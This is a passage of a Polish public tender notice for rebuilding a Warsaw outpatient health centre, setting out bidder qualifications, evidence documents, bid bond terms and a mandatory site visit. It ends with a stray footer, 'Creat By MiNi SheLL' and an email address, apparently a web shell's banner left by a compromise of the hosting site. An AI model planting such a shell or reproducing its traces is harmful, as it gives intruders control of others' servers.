przewidzianą do pełnienia funkcji kierownika robót sanitarnych, posiadającej uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz posiadającej co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności, obejmujące wykonanie co najmniej 2 usług polegających na kierowaniu robotami sanitarnymi dotyczącymi realizacji obiektu podmiotu wykonującego działalność leczniczą, o wartości brutto kierowanych robót w każdej z tych usług co najmniej 1 000 000,00 zł brutto (słownie: jeden milion złotych 00/100);<br/>c)	co najmniej jednej osoby przewidzianej do pełnienia funkcji kierownika robót elektrycznych, posiadającej uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz posiadającej co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności, obejmujące wykonanie co najmniej 2 usług polegających na kierowaniu robotami elektrycznymi dotyczącymi realizacji obiektu podmiotu wykonującego działalność leczniczą, o wartości brutto kierowanych robót w każdej z tych usług co najmniej 500 000,00 zł brutto (słownie: pięćset tysięcy złotych 00/100);<br/>d)	projektantem BIM koordynatorem, posiadającym umiejętność modelowania 3D BIM w programie Revit lub innym zgodnym ze standardem wymiany danych IFC, umożliwiającym Zamawiającemu swobodne i bezstratne korzystanie z eksploatacyjnego modelu informacyjnego AIM w przeglądarce internetowej Autodesk Viewer. oraz posiadającej co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności, obejmujące wykonanie co najmniej 1 usługi polegających na koordynowaniu prac z zakresu obsługi wykonawczego i powykonawczego modelu 3D BIM dotyczącego realizacji budynku szpitala lub zakładu opieki medycznej objętych klasą obiektu 1264 wg Polskiej Klasyfikacji Obiektów Budowlanych, o łącznej powierzchni zakresu prac co najmniej 1700 m2;<br/>2)	Wykonawca spełni warunek, jeśli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zamówienia w czynnych obiektach - budynku szpitala lub zakładu opieki medycznej objętych klasą obiektu 1264 wg Polskiej Klasyfikacji Obiektów Budowlanych, w ramach których wykonano roboty związane z modernizacją pomieszczeń w zakresie:<br/>a)	robót budowlanych z kompleksowym wykończeniem pomieszczeń oraz technologią medyczną,<br/>b)	instalacji elektrycznych silnoprądowych,<br/>c)	instalacji kontroli dostępu,<br/>d)	instalacji przywoławczej,<br/>e)	instalacji sygnalizacji pożaru,<br/>f)	instalacji okablowania strukturalnego,<br/>g)	instalacji wodociągowej, kanalizacyjnej i instalacji wodociągowej przeciwpożarowej,<br/>h)	instalacji wentylacji mechanicznej i klimatyzacji,<br/>i)	instalacji gazów medycznych,<br/>o łącznej powierzchni zakresu prac co najmniej 1700 m2 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty zgodnie z art. 273 ust. 1 i 2 ustawy Pzp Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu oraz spełniania warunków udziału w postępowaniu – Załącznik Nr 4 do SWZ.<br/>1.	W zakresie podstawy wykluczenia określonej w art. 108 ust. 1 pkt. 5 Pzp zgodnie z § 2 ust. 1 pkt. 2 rozporządzenia w sprawie podmiotowych środków dowodowych:<br/>1)	Oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej – Załącznik Nr 6 do SWZ.<br/>2.	W zakresie podstawy wykluczenia: zgodnie z art. 22 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507): <br/>1)	Oświadczenie, o przeciwdziałaniu wspierania agresji na Ukrainę przepisy „sankcyjne” – Załącznik N 5 do SWZ.<br/>3.	Jeśli Wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych <br/>w postępowaniu lub są niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba, że wniosek o dopuszczenie do udziału w postępowaniu albo oferta Wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu Zamawiający żąda złożenia:<br/>1)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia <br/>na sumę gwarancyjną określoną przez Zamawiającego w Rozdz. IX pkt 3 ppkt 1 SWZ oraz posiada polisę ubezpieczenia budowy/montażu od wszystkich ryzyk – CAR/EAR. Wykonawca zobowiązany jest przedłożyć obie polisy.<br/>2)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania <br/>i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami,<br/> o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykaz robót budowlanych musi potwierdzać spełnianie warunku, o którym mowa w Rozdz. IX pkt 4 ppkt 2 SWZ – wg. Załącznika Nr 11 do SWZ;<br/>3)	jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w pkt. 2 powyżej, dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył; Okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>4)	wartości w walutach innych niż wskazane przez Zamawiającego podane w dokumentach potwierdzających spełnianie warunku posiadania zdolności technicznej i zawodowej będą przeliczone według średniego kursu Narodowego Banku Polskiego obowiązującego <br/>na dzień zakończenia realizacji wykazanych robót budowlanych;<br/>5)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia musi zawierać dane na temat kwalifikacji zawodowych i doświadczenia wskazanych osób potwierdzające spełnienie warunku, o którym mowa w Rozdz. IX pkt 4 ppkt 1 lit. a-d SWZ – wg. Załącznika Nr 12 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający żąda złożenia w postępowaniu wraz z ofertą przedmiotowych środków dowodowych. <br/>2.	W celu potwierdzenia zgodności oferowanych dostaw z wymaganymi cechami oraz z wymaganiami związanymi z realizacją zamówienia, Zamawiający żąda od Wykonawcy: <br/>1)	dokumentów potwierdzających dopuszczenie wyrobu medycznego do obrotu i do używania oraz oznakowanie znakiem CE zgodnie z ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (t.j. Dz. U. z 2022 r. poz. 974), lub innym aktem prawnym właściwym dla kraju, w którym Wykonawca ma miejsce zamieszkania lub siedzibę ze zmianami, jeżeli wystąpiły w okresie od wystawienia dokumentu do terminu składania ofert - dotyczy wyposażenia specjalistycznego (dla wyrobów medycznych),<br/>2)	kart katalogowych na wyroby medyczne i niemedyczne, wraz z opisami technicznymi w języku polskim. Zamawiający dopuszcza katalogi w języku angielskim wraz z opisami technicznymi oferowanych wyrobów w języku polskim. Instrukcje obsługi w języku polskim (przy dostawie) – dla wyrobów medycznych i niemedycznych,<br/>3)	w zakresie zabudów meblowych - meble wykonane z materiałów posiadających wymagane świadectwa dopuszczające do eksploatacji w pomieszczeniach medycznych. <br/>3.	Dla potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów oferent zobowiązany jest do dostarczenia:<br/>1)	dokumentu potwierdzającego, iż przedmiot oferty może być stosowany w placówkach służby zdrowia (dotyczy wyrobów gotowych), np. Atest Higieniczny;<br/>2)	Deklaracji zgodności producenta potwierdzającą zgodność produktów z wymaganiami wybranych Polskich Norm w zakresie wytrzymałości konstrukcji i bezpieczeństwa użytkowania oraz zgodności z wymaganiami zasadniczymi Dyrektywy 2001/95/WE Parlamentu Europejskiego i Rady w sprawie ogólnego bezpieczeństwa produktów <br/>z załączonym certyfikatem ISO 9001 dla producenta dotyczącym dystrybucji <br/>i serwisowania wyrobów medycznych wraz z wyposażeniem i certyfikatem ISO 13485 – potwierdzającym wdrożenie i utrzymywanie systemów zarządzania jakością <br/>w zakresie objętym certyfikacją.<br/>3) złożenia kompletu dokumentów potwierdzających, że oferowane przez Wykonawcę materiały spełniają parametry określone przez Zamawiającego w Dokumentacji technicznej – z uwzględnieniem wymagań zawartych w Specyfikacja technicznej sprzętu i wyposażenia specjalistycznego - Załącznik Nr 1B do SWZ<br/>4.	Przedmiotowe środki dowodowe, należy złożyć w formie elektronicznej - podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (e-dowód).<br/>5.	Zamawiający przewiduje możliwość uzupełnienia przedmiotowych środków dowodowych (wszystkich wskazanych w pkt 2 i 3, jeśli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne. Wykonawca może uzupełnić przedmiotowe środki dowodowe, ale tylko na wezwanie Zamawiającego. <br/>6.	Przepisu zawartego w pkt 4 nie stosuje się, jeżeli pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>7.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>8.	Przedmiotowe środki dowodowe, wskazane w ust. 2 i 3, składa się wraz z ofertą w formie elektronicznej.<br/>9.	Składane przez Wykonawcę przedmiotowe środki dowodowe, powinny uwzględniać dopuszczenia wynikające z udzielonych wyjaśnień do treści SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	dokumenty potwierdzających dopuszczenie wyrobu medycznego do obrotu i do używania oraz oznakowanie znakiem CE zgodnie z ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (t.j. Dz. U. z 2022 r. poz. 974), lub innym aktem prawnym właściwym dla kraju, w którym Wykonawca ma miejsce zamieszkania lub siedzibę ze zmianami, jeżeli wystąpiły w okresie od wystawienia dokumentu do terminu składania ofert - dotyczy wyposażenia specjalistycznego (dla wyrobów medycznych),<br/>2)	kart katalogowych na wyroby medyczne i niemedyczne, wraz z opisami technicznymi w języku polskim. Zamawiający dopuszcza katalogi w języku angielskim wraz z opisami technicznymi oferowanych wyrobów w języku polskim. Instrukcje obsługi w języku polskim (przy dostawie) – dla wyrobów medycznych i niemedycznych,<br/>3)	w zakresie zabudów meblowych - meble wykonane z materiałów posiadających wymagane świadectwa dopuszczające do eksploatacji w pomieszczeniach medycznych. <br/>3.	Dla potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów oferent zobowiązany jest do dostarczenia:<br/>1)	dokumentu potwierdzającego, iż przedmiot oferty może być stosowany w placówkach służby zdrowia (dotyczy wyrobów gotowych), np. Atest Higieniczny;<br/>2)	Deklaracji zgodności producenta potwierdzającą zgodność produktów z wymaganiami wybranych Polskich Norm w zakresie wytrzymałości konstrukcji i bezpieczeństwa użytkowania oraz zgodności z wymaganiami zasadniczymi Dyrektywy 2001/95/WE Parlamentu Europejskiego i Rady w sprawie ogólnego bezpieczeństwa produktów <br/>z załączonym certyfikatem ISO 9001 dla producenta dotyczącym dystrybucji <br/>i serwisowania wyrobów medycznych wraz z wyposażeniem i certyfikatem ISO 13485 – potwierdzającym wdrożenie i utrzymywanie systemów zarządzania jakością w zakresie objętym certyfikacją. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.	Wykonawca wraz z ofertą składa:<br/>1)	Przedmiotowe środki dowodowe - zgodnie z Rozdziałem VII SWZ,<br/>2)	Podmiotowe środki dowodowe - zgodnie z Rozdziałem X SWZ,<br/>3)	Specyfikacja techniczna sprzętu specjalistycznego - Załącznik Nr 1 B do SWZ.<br/>4)	Wypełniony i podpisany Formularz ofertowy „Oferta” - wg Załącznika Nr 2 do SWZ,<br/>5)	Formularz cenowy (Tabela wartości elementów scalonych) - Załącznik Nr 3 do SWZ,<br/>6)	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp - Załącznik Nr 4 do SWZ,<br/>7)	Kosztorys ofertowy (poglądowy) – sporządzony na podstawie przedmiarów dołączonych do dokumentacji technicznej - Załącznik Nr 1 do SWZ,<br/>8)	Oświadczenie Wykonawcy, dotyczące przesłanek wykluczenia z przepisów „sankcyjnych” - Załącznik Nr 5 do SWZ,<br/>9)	Oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp (grupa kapitałowa) - Załącznik <br/>Nr 6 do SWZ,<br/>10)	Zobowiązanie podmiotu - Załącznik Nr 8 do SWZ – jeżeli dotyczy,<br/>11)	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia składane przez podmiot udostępniający zasoby składane na podstawie <br/>art. 125 ust. 5 ustawy Pzp - Załącznik Nr 9 do SWZ – jeżeli dotyczy,<br/>12)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Załącznik Nr 10 do SWZ - jeżeli dotyczy,<br/>13)	Wykaz robót - Załącznik Nr 11 do SWZ,<br/>14)	Wykaz osób - Załącznik Nr 12 do SWZ,<br/>15)	Koncepcja pn. „Proces technologiczny wykonania robót budowlanych – montażowych - zminimalizowania utrudnień pracy obiektu Samodzielnego Zespołu Publicznych Zakładów Lecznictwa Otwartego Warszawa Praga-Północ” - zgodnie z Rozdziałem XVIII SWZ;<br/>16)	Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca składający ofertę zobowiązany jest do wniesienia wadium w wysokości: 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100). <br/>2.	Według wyboru Wykonawcy wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu, <br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz. 419).<br/>3.	Wadium w formie innej, niż pieniężna Wykonawca wnosi w oryginale w postaci elektronicznej, tj. dokumentu elektronicznego opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia, tj. wystawcę dokumentu. <br/>4.	Wykonawca wnoszący wadium w formie, która ze względu na obowiązujące przepisy może zostać wystawiona jako terminowa (np. gwarancja ubezpieczeniowa), jest zobowiązany do niezwłocznego przedłużenia jej ważności – w przypadku, gdy będą tego wymagały warunki prowadzonej procedury zamówienia.<br/>5.	Oryginał dokumentu (poręczenie bankowe, poręczenie spółdzielczej kasy oszczędnościowo-kredytowej, gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz. 419), należy dołączyć w oddzielnym pliku do oferty. <br/>6.	Sposób wniesienia wadium:<br/>1)	w przypadku wnoszenia wadium w pieniądzu:<br/>Wykonawca powinien dokonać przelewu na rachunek bankowy Zamawiającego w Banku PKO BP S.A IV O/W-wa o numerze: 67 1020 1042 0000 8002 0134 7095. Tytułem: „Przebudowa budynku Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie”. Dowodem wniesienia wadium będzie potwierdzenie przelewu elektronicznego lub wydruk przelewu elektronicznego, przy czym w terminie określonym dla wniesienia wadium, tj. do dnia 15.01.2025 r. do godziny 10.00 środki powinny znaleźć się na rachunku bankowym Zamawiającego. Potwierdzenie dokonanego przelewu elektronicznego należy dołożyć do oferty.<br/>2)	w przypadku wniesienia wadium w gwarancjach bankowych: <br/>Wykonawca powinien przedłożyć gwarancję udzieloną przez bank, zgodnie z wymaganiami określonymi przez prawo bankowe, obowiązującą przez okres związania ofertą, określony w niniejszej specyfikacji na kwotę wymienioną w pkt. 1, zawierającą informację, iż udzielona gwarancja stanowi zabezpieczenie wadium na rzecz Zamawiającego w trybie podstawowym na wykonanie robót budowlano – montażowych: Tytułem: „Przebudowa budynku Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie”, oraz zobowiązanie gwaranta <br/>do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w pkt 12.<br/>3)	w przypadku wniesienia wadium w gwarancjach ubezpieczeniowych: <br/>Wykonawca powinien przedłożyć gwarancję udzieloną przez firmę ubezpieczeniową, obowiązującą przez okres związania ofertą, określony w niniejszej specyfikacji na kwotę wymienioną w pkt.1, zawierającą informację, iż udzielona gwarancja stanowi zabezpieczenie wadium na rzecz Zamawiającego w trybie podstawowym na wykonanie robót budowlano - montażowych: „Przebudowa budynku Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie”. oraz zobowiązanie gwaranta do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w pkt 12. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie Oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zamawiający nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty w postępowaniu. W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych Wykonawców. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań / części zamówienia. Zaleca się by jako pełnomocnika wskazać podmiot (Wykonawcę). W przypadku wskazania jako pełnomocnika osoby fizycznej zaleca się podanie informacji, którego z Wykonawców pracownikiem jest wskazana osoba. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, musi być złożone w zakresie każdego z Wykonawców wspólnie ubiegających się o zamówienie. Spółka cywilna w zamówieniach publicznych: Wspólników traktuje się jako wykonawcy wspólnie ubiegających się o udzielenie zamówienia. Stanowi o tym art. 58 ustawy Pzp. W konsekwencji powyższego wspólnicy spółki cywilnej ponoszą solidarną odpowiedzialność za prawidłowe wykonanie umowy, czy też wniesienie zabezpieczenia należytego jej wykonania, jeżeli dotyczy. Składając ofertę, wykonawcy wspólnie ubiegający się o zamówienie powinni wskazać pełnomocnika podczas postępowania i ewentualnie również upoważnionego<br/>do podpisania umowy. Wspólnicy spółki cywilnej są zobowiązani do złożenia oświadczenia o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego, o którym mowa w art. 125 ustawy Pzp. Zamawiający może określić szczególny sposób spełnienia przez wykonawców wspólnie ubiegających się o zamówienie warunków udziału w postępowaniu, zgodnie z art. 117 PZP. Dany przepis również będzie miał zastosowanie do wspólników spółki cywilnej. Istotne jest dalsze uregulowanie danego przepisu, zgodnie z którym warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności jest uznawany za spełniony, gdy co najmniej jeden ze wspólników posiada takie uprawnienia. Wspólnicy mogą się także powołać na zdolności innych w celu wykazania spełnienia warunków dotyczących wykształcenia, doświadczenia czy kwalifikacji zawodowych. W sytuacji gdy wybrana została oferta spółki cywilnej, Zamawiający ma prawo żądać przed zawarciem umowy przedłożenia przez wspólników spółki cywilnej kopii umowy spółki cywilnej. W niniejszym postępowaniu Zamawiający określa warunki udziału w postępowaniu w zakresie zdolności technicznych lub zawodowych, dysponowania osobami zdolnymi do wykonania zamówienia, sytuacji finansowej lub ekonomicznej, co za tym idzie przepisy dotyczące udostępnienia zasobów będą wykorzystywane. W przypadku wspólnego ubiegania się o zamówienie Zamawiający wymaga, aby każdy z Wykonawców wziął udział w wizji lokalnej lub został ujawniony udział w wizji przedstawiciela takiego Wykonawcy. W przypadku zgłoszenia się na wizję lokalną jedynie jednego z Wykonawców występujących wspólnie (jednej firmy) bez ujawnienia udziału pozostałych podmiotów – złożenie oferty przez wykonawców występujących wspólnie będzie skutkowało odrzuceniem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Projektowanymi postanowieniami umowy - Załącznik Nr 7 do SWZ § 17 Zmiany umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć za pośrednictwem Platformy Zakupowej Marketplanet: https://szpzlo.ezamawiajacy.pl/app/login w zakładce „OFERT</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> WIZJA LOKALNA: Informacje dotyczące przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 281 ust. 2, pkt 12 ustawy Pzp.<br/>1)	Zamawiający wymaga przeprowadzenie przez Wykonawców wizji lokalnej miejsca realizacji zamówienia, w celu pozyskania wszelkich danych mogących być przydatnymi do przygotowania oferty oraz realizacji przedmiotu umowy,<br/>2)	w trakcie wizji lokalnej Zamawiający umożliwi Wykonawcom zapoznanie się z pomieszczeniami będącymi miejscem realizacji przedmiotu zamówienia,<br/>3)	w celu umówienia wizji lokalnej należy kontaktować się z osobami wyznaczonymi do komunikowania się z Wykonawcami tj. Dział Infrastruktury i Spraw Technicznych- kontakt: 22-619-58 72 wew. 1255 lub 1143, Marek Frąckiewicz, tel. 510 655 233. <br/>4)	zgłoszenie uczestnictwa w wizji lokalnej musi zawierać dane Wykonawcy, tj.: nazwę firmy, adres, nr telefonu, imię i nazwisko osoby, która będzie uczestniczyć w spotkaniu. Zgłoszenie należy przesłać na adres e-mail: marek.frackiewicz@szpzlo.pl. Osoba reprezentująca Wykonawcę musi być upełnomocniona do tej czynności w oparciu o dokumenty rejestrowe lub pełnomocnictwo, które przedłoży w oryginale lub kopii potwierdzonej za zgodność z oryginałem,<br/>5)	wizja lokalna może się odbyć, w terminie ustalonym z Zamawiającym, jednak nie później niż do dnia 09.01.2025 r.,<br/>6)	Zamawiający informuje, że wizja lokalna, będzie mogła się odbywać w godzinach pracy Zamawiającego tj. od poniedziałku do piątku, w godz. 8:00 – 15:35 z wyłączeniem dni ustawowo wolnych od pracy,<br/>7)	potwierdzeniem dokonania wizji lokalnej będzie protokół podpisany przez osoby reprezentujące Wykonawcę oraz Zamawiającego. Protokół będzie sporządzone w 2 jednobrzmiących egzemplarzach, po jednym dla Wykonawcy i Zamawiającego,<br/>8)	koszty Wykonawcy, związane z udziałem w wizji lokalnej poniesie Wykonawca,<br/>9)	Wykonawcy, którzy nie wezmą udziału w wizji lokalnej w wyznaczonym terminie lub nie podpiszą listy obecności, o której mowa w pkt 1, nie będą zdolni do rzetelnego sporządzenia wymaganych opracowań. Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 18 ustawy Pzp., który brzmi: „Zamawiający odrzuca ofertę jeżeli: została złożona bez odbycia wizji lokalnej lub bez sprawdzenia dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego, w przypadku gdy Zamawiający tego wymagał w dokumentach zamówienia”’<br/>Uwaga: w przypadku wspólnego ubiegania się o zamówienie Zamawiający wymaga, aby każdy z Wykonawców wziął udział w wizji lokalnej lub został ujawniony udział w wizji przedstawiciela takiego Wykonawcy. W przypadku zgłoszenia się na wizję lokalną jedynie jednego z Wykonawców występujących wspólnie (jednej firmy) bez ujawnienia udziału pozostałych podmiotów – złożenie oferty przez wykonawców występujących wspólnie będzie skutkowało odrzuceniem.

Creat By MiNi SheLL
Email: jattceo@gmail.com